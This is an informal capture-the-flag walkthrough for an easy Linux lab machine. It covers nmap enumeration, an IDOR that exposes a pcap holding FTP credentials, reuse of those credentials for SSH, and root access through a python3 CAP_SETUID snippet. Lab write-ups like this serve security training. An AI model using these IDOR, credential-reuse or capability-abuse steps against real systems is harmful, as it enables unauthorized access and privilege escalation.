Machine IP = 10.10.10.245
OS = Linux
Level = Easy
NMAP
(initial Scan)
iam always start with nmap (nmap -F $IP)
Not shown: 97 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
three ports are open, ok lets start with ftp
anonymous login not available :(
so then move to http(port 80)
 |
| http://10.10.10.245/ |
After sum enum i find something interstring
see..
I Download the pcap(23) file nothing useful
so i decide to change the value(23)<idor>
i change the value 23 to 0
wow /data/0 have some pcap data , so i download and read via wireshark
it have ftp credentials
and also you can use string(command) to view these cred
 |
| strings 0.pcap |
USER : nathan
PASSSWORD : Buck3tH4TF0RM3!
lets login ftp via these creds
ftp have user.txt
lets try to login ssh via same creds
 |
| ssh nathan@10.10.10.245 |
Privilege Escalation
after run linpeas.sh
found CAP_SETUID set to python3
This means that it's possible to set the effective user id of the created process :)
Steps to Became Root
import os
os.setuid(0)
os.system("/bin/bash")
##why setuid is 0?
###because root uid is 0(default)
Thats it :)
REFER
https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities
إرسال تعليق